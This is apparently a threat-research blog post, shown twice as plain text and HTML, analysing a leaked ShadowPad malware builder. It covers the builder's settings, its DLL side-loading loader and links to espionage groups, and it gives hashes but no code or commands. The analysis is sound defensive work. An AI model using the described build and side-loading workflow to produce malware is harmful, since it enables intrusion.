<li>9a0b0439e6fd2403f764acf0527f2365a4b9a98e9643cd5d03ccccf3825a732e</li> <li>9aba997bbf2f38f68ad8cc3474ef68eedd0b99e8f7ce39045f1d770e2af24fea</li> <li>bc94da1a066cbb9bdee7a03145609d0f9202b426a52aca19cc8d145b4175603b</li> </ul>
Building Casper’s Shadow

Sun, 30 Jun 2024 15:00:00 -0000

Introduction A few days ago, we came across a peculiar file. It looked like some kind of builder, and a quick glance at the settings piqued our interest. It appeared to be a ShadowPad builder, probably created around 2021. ShadowPad builders became a topic of conversation around the time of the i-Soon leak, but we had never seen the actual builder ourselves. This is likely true for most of you as well. We were so intrigued that we carefully investigated this builder and reviewed past attack campaigns. In this article, we will share how attackers build ShadowPad, what we discovered through our investigation, and our insights. Our investigation is still ongoing. We would love to engage in active discussions with you. If you have any opinions or comments, please feel free to contact us. [Note] What we discovered this time is a builder. It does not include a controller. Therefore, it is not possible to control what is generated by this builder. In other words, this builder alone is not meaningful in the real world. Background In June 2024, we happened to read a research memo from a year ago. We often read past memos for a change of pace. In doing so, we recalled an attack on Kyrgyzstan in April 2023. https://x.com/nao_sec/status/1648960199938707456 This attack involved a file resembling a RoyalRoad RTF, which prompted our investigation at the time. Opening this RTF file with a vulnerable version of Microsoft Word displayed a decoy file related to Kyrgyzstan’s cybersecurity, while simultaneously writing and executing several files to the disk. As a result, a CobaltStrike beacon was executed. The loader that decrypted and executed the beacon resembled Casper Loader. Casper Loader is familiar to threat researchers specializing in East Asia and has been reported to be used in attacks by Tick12. Our friend @aRtAGGI conducted similar analyses at the time. https://x.com/aRtAGGI/status/1649184131090087938 We later found that a similar attack had been carried out against Kazakhstan after searching our past database. The attack on Kazakhstan was older than the one on Kyrgyzstan, occurring around November 2022. In this case, the same loader executed from the RTF file eventually ran the CobaltStrike beacon. Information about the RTF files used in the attacks on Kyrgyzstan and Kazakhstan is listed in the IoC sheet from our previous research on RoyalRoad RTF34. We have identified these as U-4. If you are interested, please refer to the IoC sheet. https://nao-sec.org/jsac2020_ioc.html Let’s return to the present. To investigate recent attack samples, we executed a search query based on the characteristics of the loader used in the attack on Kyrgyzstan. exports:IEE2 exports:LoadLibraryShim2 exports:LoadStringRC2 We found an unusual file posted in May 2024. This data was embedded in the resource section of another file. We downloaded and executed the original file. To our surprise, it was a ShadowPad builder. CasperVMakerHTTPx86 MD5 eb99580e0d90ee61b3e2e3bd8715c633 SHA-1 706482eda6d747ca2688cdfd97399f800da9e73c SHA-256 b6d7c456423c871c7ffe418069a75c39055e4e3d023021c8b0885a02c7ce93c6 When launching the ShadowPad builder, which calls itself CasperVMakerHTTPx86, the following screen appears. There are several tabs, each with various settings. First Install Inject Online Proxy DNS These items are very similar to the reported architecture of ShadowPad5. This suggests that these tabs are configuration items for each module. The settings for each item are as follows: Let’s try building ShadowPad. By clicking the “Build EXE x86” button, ShadowPad is generated. If the build is successful, an EXE file and a DLL file are created. The EXE file is a legitimate AppLaunch. It loads the mscoree.dll in the same directory via DLL Side-Loading. The DLL file is the Casper Loader, which decodes and executes the ShadowPad shellcode stored internally. Comparison with Similar Samples ShadowPad loaders exhibit several patterns, but those generated using this builder are decoded using a custom XOR with constants. There are many samples with similar characteristics, but we will introduce two of them. Sample-1 According to Macnica’s report2, Tick uses Casper Loader to execute ShadowPad. Comparing this Casper Loader with the loader created using the builder reveals that while the Macnica sample contains junk code and different fixed values, the algorithm is the same. Sample-2 A report released by the FBI in December 20216 reported an attack exploiting CVE-2021-44515 where ShadowPad was used. The AppLaunch.exe and mscoree.dll in this case used Casper Loader to execute ShadowPad. Comparing this Casper Loader with the one created using the builder shows that the algorithm and fixed values are identical. Although API Hashing is not used, it is a highly similar sample. ShadowPad Community As you know, ShadowPad is commercial software sold for profit. According to SentinelOne’s report from 20215, ShadowPad is sold to various targeted attack groups, and there is speculation that whg and Rose are involved in its development. The i-Soon leak in February 2024 reported that i-Soon was selling software that appeared to be ShadowPad (including source code and training)7. As various researchers have reported256891011121314151617181920212223242526272829303132333435363738, many targeted attack groups use ShadowPad. These can be broadly categorized into two groups: attack groups associated with the MSS, like APT41, and those associated with the PLA, like Tick. As previously mentioned, it is generally believed that whg and Rose were involved in ShadowPad’s development. There is no compelling reason to refute this, so we will proceed with this assumption. According to a U.S. government report related to APT4139, Rose (Tan Dailin) was involved in APT41. Seven individuals were indicted for their involvement with APT41, with Rose (and Zhang Haoran) being particularly noted for their involvement in both BARIUM and LEAD, making them key figures in APT41’s activities. This background suggests that BARIUM was the earliest adopter of ShadowPad, followed by LEAD. In contrast, the PLA has many more attack groups using ShadowPad than the MSS. This is generally because many researchers have given them different names, and their relationships are not sufficiently organized. If you are a researcher, you probably have more organized information in your mind (or within your organization). Of course, we understand and accept this. However, to keep things simple, we will exclude such discussions in this article and share how we organized this information within nao_sec. Interestingly, all these attack groups used the RoyalRoad RTF Weaponizer. Is this just a coincidence? ShadowPad and RoyalRoad RTF Weaponizer may be shared through the same channels. Conclusion In this article, we introduced the ShadowPad builder. ShadowPad, widely used by various targeted attack groups as a successor to PlugX, had limited information available about its builder until now. This article sheds light on how attackers build ShadowPad. We also organized the relationships between attack groups using ShadowPad. Our research is still ongoing. We would love to engage in active discussions. If you have any opinions or comments, please contact us. We look forward to hearing from you. Acknowledgments We received a lot of help from our friends in writing this article. While we won’t name individuals here, we are immensely grateful to the many supportive reviewers. We want to take this opportunity to express our deepest gratitude to you. References TrendMicro, “Operation ENDTRADE: TICK’s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data”, https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf ↩ マクニカ, “標的型攻撃の実態と対策アプローチ第5版日本を狙うサイバーエスピオナージの動向 2020年度”, https://www.macnica.co.jp/business/security/manufacturers/files/mpressioncss_ta_report_2020_5.pdf ↩ ↩2 ↩3 nao_sec, “An Overhead View of the Royal Road”, https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html ↩ nao_sec, “Royal Road! Re:Dive”, https://nao-sec.org/2021/01/royal-road-redive.html ↩ SentinelOne, “ShadowPad A Masterpiece of Privately Sold Malware in Chinese Espionage”, https://www.sentinelone.com/labs/shadowpad-a-masterpiece-of-privately-sold-malware-in-chinese-espionage/ ↩ ↩2 ↩3 FBI, “APT Actors Exploiting Newly-Identified Zero Day in ManageEngine Desktop Central”, https://www.ic3.gov/Media/News/2021/211220.pdf ↩ ↩2 HarfangLab, “A comprehensive analysis of I-Soon’s commercial offering”, https://harfanglab.io/en/insidethelab/isoon-leak-analysis/ ↩ Kaspersky, “ShadowPad in corporate networks”, https://securelist.com/shadowpad-in-corporate-networks/81432/ ↩ Kaspersky, “Operation ShadowHammer”, https://securelist.com/operation-shadowhammer/89992/ ↩ ESET, “Connecting the dots: Exposing the arsenal and methods of the Winnti Group”, https://www.welivesecurity.com/2019/10/14/connecting-dots-exposing-arsenal-methods-winnti/ ↩ ESET, “Winnti Group targeting universities in Hong Kong”, https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/ ↩ マクニカ, “標的型攻撃の実態と対策アプローチ第4版日本を狙うサイバーエスピオナージの動向 2019年度下期”, https://www.macnica.co.jp/business/security/manufacturers/files/mpressioncss_ta_report_2019_4.pdf ↩ PwC, “Around the world in 80 days 4.2bn packets”, https://www.youtube.com/watch?v=YCwyc6SctYs ↩ CrowdStrike, “Manufacturing Industry in the Adversaries’ Crosshairs”, https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/ ↩ Kaspersky, “APT trends report Q2 2020”, https://securelist.com/apt-trends-report-q2-2020/97937/ ↩ Positive Technologies, “ShadowPad: new activity from the Winnti group”, https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf ↩ Symantec, “APT41: Indictments Put Chinese Espionage Group in the Spotlight”, https://symantec-enterprise-blogs.security.com/threat-intelligence/apt41-indictments-china-espionage ↩ Dr.Web, “Study of the ShadowPad APT backdoor and its relation to PlugX”, https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf ↩ TrendMicro, “Earth Akhlut: Exploring the Tools, Tactics, and Procedures of an Advanced Threat Actor Operating a Large Infrastructure”, https://vblocalhost.com/uploads/VB2020-Lunghi-Horejsi.pdf ↩ ESET, “Operation StealthyTrident: corporate software under attack”, https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/ ↩ Positive Technologies, “Higaisa or Winnti? APT41 backdoors, old and new”, https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/ ↩ Recorded Future, “China-Linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions”, https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf ↩ Recorded Future, “Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling”, https://www.recordedfuture.com/blog/chinese-group-tag-22-targets-nepal-philippines-taiwan ↩ TrendMicro, “Delving Deep: An Analysis of Earth Lusca’s Operations”, https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf ↩ Secureworks, “ShadowPad Malware Analysis”, https://www.secureworks.com/research/shadowpad-malware-analysis ↩ Recorded Future, “Continued Targeting of Indian Power Grid Assets by Chinese State-Sponsored Activity Group”, https://go.recordedfuture.com/hubfs/reports/ta-2022-0406.pdf ↩ SentinelOne, “Moshen Dragon’s Triad-and-Error Approach Abusing Security Software to Sideload PlugX and ShadowPad”, https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/ ↩ TeamT5, “The Next Gen PlugX - ShadowPad - A Dive into the Emerging China-Nexus Modular Trojan, Pangolin8RAT”, https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf ↩ Positive Technologies, “Space Pirates: analyzing the tools and connections of a new hacker group”, https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/ ↩ Kaspersky, “Attacks on industrial control systems using ShadowPad”, https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/ ↩ ESET, “Worok: The big picture”, https://www.welivesecurity.com/2022/09/06/worok-big-picture/ ↩ Elastic, “Update to the REF2924 intrusion set and related campaigns”, https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns ↩ Symantec, “Lancefly: Group Uses Custom Backdoor to Target Orgs in Government, Aviation, Other Sectors”, https://symantec-enterprise-blogs.security.com/threat-intelligence/lancefly-merdoor-zxshell-custom-backdoor ↩ TrendMicro, “Possible Supply-Chain Attack Targeting Pakistani Government Delivers Shadowpad”, https://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html ↩ Recorded Future, “RedHotel: A Prolific, Chinese State-Sponsored Group Operating at a Global Scale”, https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf ↩ Symantec, “Redfly: Espionage Actors Continue to Target Critical Infrastructure”, https://symantec-enterprise-blogs.security.com/threat-intelligence/critical-infrastructure-attacks ↩ Palo Alto Networks, “Cyberespionage Attacks Against Southeast Asian Government Linked to Stately Taurus, Aka Mustang Panda”, https://unit42.paloaltonetworks.com/stately-taurus-attacks-se-asian-government/ ↩ TrendMicro, “Earth Krahang Exploits Intergovernmental Trust to Launch Cross-Government Attacks”, https://www.trendmicro.com/en_us/research/24/c/earth-krahang.html ↩ United States Department of Justice, “Seven International Cyber Defendants, Including “Apt41” Actors, Charged In Connection With Computer Intrusion Campaigns Against More Than 100 Victims Globally”, https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer ↩

<img src="https://nao-sec.org/assets/2024-07-01/top.png" alt="" /> <h2 id="introduction">Introduction</h2> A few days ago, we came across a peculiar file. It looked like some kind of builder, and a quick glance at the settings piqued our interest. It appeared to be a ShadowPad builder, probably created around 2021. ShadowPad builders became a topic of conversation around the time of the i-Soon leak, but we had never seen the actual builder ourselves. This is likely true for most of you as well. We were so intrigued that we carefully investigated this builder and reviewed past attack campaigns. In this article, we will share how attackers build ShadowPad, what we discovered through our investigation, and our insights. Our investigation is still ongoing. We would love to engage in active discussions with you. If you have any opinions or comments, please feel free to contact us. [Note] What we discovered this time is a builder. It does not include a controller. Therefore, it is not possible to control what is generated by this builder. In other words, this builder alone is not meaningful in the real world. <h2 id="background">Background</h2> In June 2024, we happened to read a research memo from a year ago. We often read past memos for a change of pace. In doing so, we recalled an attack on Kyrgyzstan in April 2023. <img src="https://nao-sec.org/assets/2024-07-01/1.png" alt="" /> <a href="https://x.com/nao_sec/status/1648960199938707456">https://x.com/nao_sec/status/1648960199938707456</a> This attack involved a file resembling a RoyalRoad RTF, which prompted our investigation at the time. Opening this RTF file with a vulnerable version of Microsoft Word displayed a decoy file related to Kyrgyzstan’s cybersecurity, while simultaneously writing and executing several files to the disk. As a result, a CobaltStrike beacon was executed. <img src="https://nao-sec.org/assets/2024-07-01/2.png" alt="" /> The loader that decrypted and executed the beacon resembled Casper Loader. Casper Loader is familiar to threat researchers specializing in East Asia and has been reported to be used in attacks by Tick<a href="#fn:1" class="footnote" rel="footnote">1</a><a href="#fn:2" class="footnote" rel="footnote">2</a>. Our friend @aRtAGGI conducted similar analyses at the time. <img src="https://nao-sec.org/assets/2024-07-01/3.png" alt="" /> <a href="https://x.com/aRtAGGI/status/1649184131090087938">https://x.com/aRtAGGI/status/1649184131090087938</a> We later found that a similar attack had been carried out against Kazakhstan after searching our past database. The attack on Kazakhstan was older than the one on Kyrgyzstan, occurring around November 2022. In this case, the same loader executed from the RTF file eventually ran the CobaltStrike beacon. Information about the RTF files used in the attacks on Kyrgyzstan and Kazakhstan is listed in the IoC sheet from our previous research on RoyalRoad RTF<a href="#fn:3" class="footnote" rel="footnote">3</a><a href="#fn:4" class="footnote" rel="footnote">4</a>. We have identified these as <code class="language-plaintext highlighter-rouge">U-4</code>. If you are interested, please refer to the IoC sheet. <a href="https://nao-sec.org/jsac2020_ioc.html">https://nao-sec.org/jsac2020_ioc.html</a> Let’s return to the present. To investigate recent attack samples, we executed a search query based on the characteristics of the loader used in the attack on Kyrgyzstan. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>exports:IEE2 exports:LoadLibraryShim2 exports:LoadStringRC2 </code></pre></div></div> We found an unusual file posted in May 2024. This data was embedded in the resource section of another file. We downloaded and executed the original file. To our surprise, it was a ShadowPad builder. <h2 id="caspervmakerhttpx86">CasperVMakerHTTPx86</h2> <table> <tbody> <tr> <td>MD5</td> <td>eb99580e0d90ee61b3e2e3bd8715c633</td> </tr> <tr> <td>SHA-1</td> <td>706482eda6d747ca2688cdfd97399f800da9e73c</td> </tr> <tr> <td>SHA-256</td> <td>b6d7c456423c871c7ffe418069a75c39055e4e3d023021c8b0885a02c7ce93c6</td> </tr> </tbody> </table> <img src="https://nao-sec.org/assets/2024-07-01/5.png" alt="" /> When launching the ShadowPad builder, which calls itself CasperVMakerHTTPx86, the following screen appears. There are several tabs, each with various settings. <ul> <li>First</li> <li>Install</li> <li>Inject</li> <li>Online</li> <li>Proxy</li> <li>DNS</li> </ul> These items are very similar to the reported architecture of ShadowPad<a href="#fn:5" class="footnote" rel="footnote">5</a>. This suggests that these tabs are configuration items for each module. The settings for each item are as follows: <img src="https://nao-sec.org/assets/2024-07-01/6.png" alt="" /> <img src="https://nao-sec.org/assets/2024-07-01/7.png" alt="" /> <img src="https://nao-sec.org/assets/2024-07-01/8.png" alt="" /> <img src="https://nao-sec.org/assets/2024-07-01/9.png" alt="" /> <img src="https://nao-sec.org/assets/2024-07-01/10.png" alt="" /> Let’s try building ShadowPad. By clicking the “Build EXE x86” button, ShadowPad is generated. If the build is successful, an EXE file and a DLL file are created. <img src="https://nao-sec.org/assets/2024-07-01/11.png" alt="" /> The EXE file is a legitimate AppLaunch. It loads the mscoree.dll in the same directory via DLL Side-Loading. The DLL file is the Casper Loader, which decodes and executes the ShadowPad shellcode stored internally. <img src="https://nao-sec.org/assets/2024-07-01/12.png" alt="" /> <h2 id="comparison-with-similar-samples">Comparison with Similar Samples</h2> ShadowPad loaders exhibit several patterns, but those generated using this builder are decoded using a custom XOR with constants. <img src="https://nao-sec.org/assets/2024-07-01/13.png" alt="" /> There are many samples with similar characteristics, but we will introduce two of them. <h3 id="sample-1">Sample-1</h3> According to Macnica’s report<a href="#fn:2" class="footnote" rel="footnote">2</a>, Tick uses Casper Loader to execute ShadowPad. Comparing this Casper Loader with the loader created using the builder reveals that while the Macnica sample contains junk code and different fixed values, the algorithm is the same. <img src="https://nao-sec.org/assets/2024-07-01/14.png" alt="" /> <h3 id="sample-2">Sample-2</h3> A report released by the FBI in December 2021<a href="#fn:6" class="footnote" rel="footnote">6</a> reported an attack exploiting CVE-2021-44515 where ShadowPad was used. The AppLaunch.exe and mscoree.dll in this case used Casper Loader to execute ShadowPad. Comparing this Casper Loader with the one created using the builder shows that the algorithm and fixed values are identical. Although API Hashing is not used, it is a highly similar sample. <img src="https://nao-sec.org/assets/2024-07-01/15.png" alt="" /> <h2 id="shadowpad-community">ShadowPad Community</h2> As you know, ShadowPad is commercial software sold for profit. According to SentinelOne’s report from 2021<a href="#fn:5" class="footnote" rel="footnote">5</a>, ShadowPad is sold to various targeted attack groups, and there is speculation that whg and Rose are involved in its development. The i-Soon leak in February 2024 reported that i-Soon was selling software that appeared to be ShadowPad (including source code and training)<a href="#fn:7" class="footnote" rel="footnote">7</a>. As various researchers have reported<a href="#fn:2" class="footnote" rel="footnote">2</a><a href="#fn:5" class="footnote" rel="footnote">5</a><a href="#fn:6" class="footnote" rel="footnote">6</a><a href="#fn:8" class="footnote" rel="footnote">8</a><a href="#fn:9" class="footnote" rel="footnote">9</a><a href="#fn:10" class="footnote" rel="footnote">10</a><a href="#fn:11" class="footnote" rel="footnote">11</a><a href="#fn:12" class="footnote" rel="footnote">12</a><a href="#fn:13" class="footnote" rel="footnote">13</a><a href="#fn:14" class="footnote" rel="footnote">14</a><a href="#fn:15" class="footnote" rel="footnote">15</a><a href="#fn:16" class="footnote" rel="footnote">16</a><a href="#fn:17" class="footnote" rel="footnote">17</a><a href="#fn:18" class="footnote" rel="footnote">18</a><a href="#fn:19" class="footnote" rel="footnote">19</a><a href="#fn:20" class="footnote" rel="footnote">20</a><a href="#fn:21" class="footnote" rel="footnote">21</a><a href="#fn:22" class="footnote" rel="footnote">22</a><a href="#fn:23" class="footnote" rel="footnote">23</a><a href="#fn:24" class="footnote" rel="footnote">24</a><a href="#fn:25" class="footnote" rel="footnote">25</a><a href="#fn:26" class="footnote" rel="footnote">26</a><a href="#fn:27" class="footnote" rel="footnote">27</a><a href="#fn:28" class="footnote" rel="footnote">28</a><a href="#fn:29" class="footnote" rel="footnote">29</a><a href="#fn:30" class="footnote" rel="footnote">30</a><a href="#fn:31" class="footnote" rel="footnote">31</a><a href="#fn:32" class="footnote" rel="footnote">32</a><a href="#fn:33" class="footnote" rel="footnote">33</a><a href="#fn:34" class="footnote" rel="footnote">34</a><a href="#fn:35" class="footnote" rel="footnote">35</a><a href="#fn:36" class="footnote" rel="footnote">36</a><a href="#fn:37" class="footnote" rel="footnote">37</a><a href="#fn:38" class="footnote" rel="footnote">38</a>, many targeted attack groups use ShadowPad. These can be broadly categorized into two groups: attack groups associated with the MSS, like APT41, and those associated with the PLA, like Tick. As previously mentioned, it is generally believed that whg and Rose were involved in ShadowPad’s development. There is no compelling reason to refute this, so we will proceed with this assumption. According to a U.S. government report related to APT41<a href="#fn:39" class="footnote" rel="footnote">39</a>, Rose (Tan Dailin) was involved in APT41. Seven individuals were indicted for their involvement with APT41, with Rose (and Zhang Haoran) being particularly noted for their involvement in both BARIUM and LEAD, making them key figures in APT41’s activities. This background suggests that BARIUM was the earliest adopter of ShadowPad, followed by LEAD. <img src="https://nao-sec.org/assets/2024-07-01/16.png" alt="" /> In contrast, the PLA has many more attack groups using ShadowPad than the MSS. This is generally because many researchers have given them different names, and their relationships are not sufficiently organized. If you are a researcher, you probably have more organized information in your mind (or within your organization). Of course, we understand and accept this. However, to keep things simple, we will exclude such discussions in this article and share how we organized this information within nao_sec. Interestingly, all these attack groups used the RoyalRoad RTF Weaponizer. Is this just a coincidence? ShadowPad and RoyalRoad RTF Weaponizer may be shared through the same channels. <img src="https://nao-sec.org/assets/2024-07-01/17.png" alt="" /> <h2 id="conclusion">Conclusion</h2> In this article, we introduced the ShadowPad builder. ShadowPad, widely used by various targeted attack groups as a successor to PlugX, had limited information available about its builder until now. This article sheds light on how attackers build ShadowPad. We also organized the relationships between attack groups using ShadowPad. Our research is still ongoing. We would love to engage in active discussions. If you have any opinions or comments, please contact us. We look forward to hearing from you. <h2 id="acknowledgments">Acknowledgments</h2> We received a lot of help from our friends in writing this article. While we won’t name individuals here, we are immensely grateful to the many supportive reviewers. We want to take this opportunity to express our deepest gratitude to you. <h2 id="references">References</h2> <div class="footnotes" role="doc-endnotes"> <ol> <li id="fn:1" role="doc-endnote"> TrendMicro, “Operation ENDTRADE: TICK’s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data”, https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf <a href="#fnref:1" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:2" role="doc-endnote"> マクニカ, “標的型攻撃の実態と対策アプローチ第5版日本を狙うサイバーエスピオナージの動向 2020年度”, https://www.macnica.co.jp/business/security/manufacturers/files/mpressioncss_ta_report_2020_5.pdf <a href="#fnref:2" class="reversefootnote" role="doc-backlink">↩</a> <a href="#fnref:2:1" class="reversefootnote" role="doc-backlink">↩2</a> <a href="#fnref:2:2" class="reversefootnote" role="doc-backlink">↩3</a> </li> <li id="fn:3" role="doc-endnote"> nao_sec, “An Overhead View of the Royal Road”, https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html <a href="#fnref:3" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:4" role="doc-endnote"> nao_sec, “Royal Road! Re:Dive”, https://nao-sec.org/2021/01/royal-road-redive.html <a href="#fnref:4" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:5" role="doc-endnote"> SentinelOne, “ShadowPad A Masterpiece of Privately Sold Malware in Chinese Espionage”, https://www.sentinelone.com/labs/shadowpad-a-masterpiece-of-privately-sold-malware-in-chinese-espionage/ <a href="#fnref:5" class="reversefootnote" role="doc-backlink">↩</a> <a href="#fnref:5:1" class="reversefootnote" role="doc-backlink">↩2</a> <a href="#fnref:5:2" class="reversefootnote" role="doc-backlink">↩3</a> </li> <li id="fn:6" role="doc-endnote"> FBI, “APT Actors Exploiting Newly-Identified Zero Day in ManageEngine Desktop Central”, https://www.ic3.gov/Media/News/2021/211220.pdf <a href="#fnref:6" class="reversefootnote" role="doc-backlink">↩</a> <a href="#fnref:6:1" class="reversefootnote" role="doc-backlink">↩2</a> </li> <li id="fn:7" role="doc-endnote"> HarfangLab, “A comprehensive analysis of I-Soon’s commercial offering”, https://harfanglab.io/en/insidethelab/isoon-leak-analysis/ <a href="#fnref:7" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:8" role="doc-endnote"> Kaspersky, “ShadowPad in corporate networks”, https://securelist.com/shadowpad-in-corporate-networks/81432/ <a href="#fnref:8" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:9" role="doc-endnote"> Kaspersky, “Operation ShadowHammer”, https://securelist.com/operation-shadowhammer/89992/ <a href="#fnref:9" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:10" role="doc-endnote"> ESET, “Connecting the dots: Exposing the arsenal and methods of the Winnti Group”, https://www.welivesecurity.com/2019/10/14/connecting-dots-exposing-arsenal-methods-winnti/ <a href="#fnref:10" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:11" role="doc-endnote"> ESET, “Winnti Group targeting universities in Hong Kong”, https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/ <a href="#fnref:11" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:12" role="doc-endnote"> マクニカ, “標的型攻撃の実態と対策アプローチ第4版日本を狙うサイバーエスピオナージの動向 2019年度下期”, https://www.macnica.co.jp/business/security/manufacturers/files/mpressioncss_ta_report_2019_4.pdf <a href="#fnref:12" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:13" role="doc-endnote"> PwC, “Around the world in 80 days 4.2bn packets”, https://www.youtube.com/watch?v=YCwyc6SctYs <a href="#fnref:13" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:14" role="doc-endnote"> CrowdStrike, “Manufacturing Industry in the Adversaries’ Crosshairs”, https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/ <a href="#fnref:14" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:15" role="doc-endnote"> Kaspersky, “APT trends report Q2 2020”, https://securelist.com/apt-trends-report-q2-2020/97937/ <a href="#fnref:15" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:16" role="doc-endnote"> Positive Technologies, “ShadowPad: new activity from the Winnti group”, https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf <a href="#fnref:16" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:17" role="doc-endnote"> Symantec, “APT41: Indictments Put Chinese Espionage Group in the Spotlight”, https://symantec-enterprise-blogs.security.com/threat-intelligence/apt41-indictments-china-espionage <a href="#fnref:17" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:18" role="doc-endnote"> Dr.Web, “Study of the ShadowPad APT backdoor and its relation to PlugX”, https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf <a href="#fnref:18" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:19" role="doc-endnote"> TrendMicro, “Earth Akhlut: Exploring the Tools, Tactics, and Procedures of an Advanced Threat Actor Operating a Large Infrastructure”, https://vblocalhost.com/uploads/VB2020-Lunghi-Horejsi.pdf <a href="#fnref:19" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:20" role="doc-endnote"> ESET, “Operation StealthyTrident: corporate software under attack”, https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/ <a href="#fnref:20" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:21" role="doc-endnote"> Positive Technologies, “Higaisa or Winnti? APT41 backdoors, old and new”, https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/ <a href="#fnref:21" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:22" role="doc-endnote"> Recorded Future, “China-Linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions”, https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf <a href="#fnref:22" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:23" role="doc-endnote"> Recorded Future, “Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling”, https://www.recordedfuture.com/blog/chinese-group-tag-22-targets-nepal-philippines-taiwan <a href="#fnref:23" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:24" role="doc-endnote"> TrendMicro, “Delving Deep: An Analysis of Earth Lusca’s Operations”, https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf <a href="#fnref:24" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:25" role="doc-endnote"> Secureworks, “ShadowPad Malware Analysis”, https://www.secureworks.com/research/shadowpad-malware-analysis <a href="#fnref:25" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:26" role="doc-endnote"> Recorded Future, “Continued Targeting of Indian Power Grid Assets by Chinese State-Sponsored Activity Group”, https://go.recordedfuture.com/hubfs/reports/ta-2022-0406.pdf <a href="#fnref:26" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:27" role="doc-endnote"> SentinelOne, “Moshen Dragon’s Triad-and-Error Approach Abusing Security Software to Sideload PlugX and ShadowPad”, https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/ <a href="#fnref:27" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:28" role="doc-endnote"> TeamT5, “The Next Gen PlugX - ShadowPad - A Dive into the Emerging China-Nexus Modular Trojan, Pangolin8RAT”, https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf <a href="#fnref:28" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:29" role="doc-endnote"> Positive Technologies, “Space Pirates: analyzing the tools and connections of a new hacker group”, https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/ <a href="#fnref:29" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:30" role="doc-endnote"> Kaspersky, “Attacks on industrial control systems using ShadowPad”, 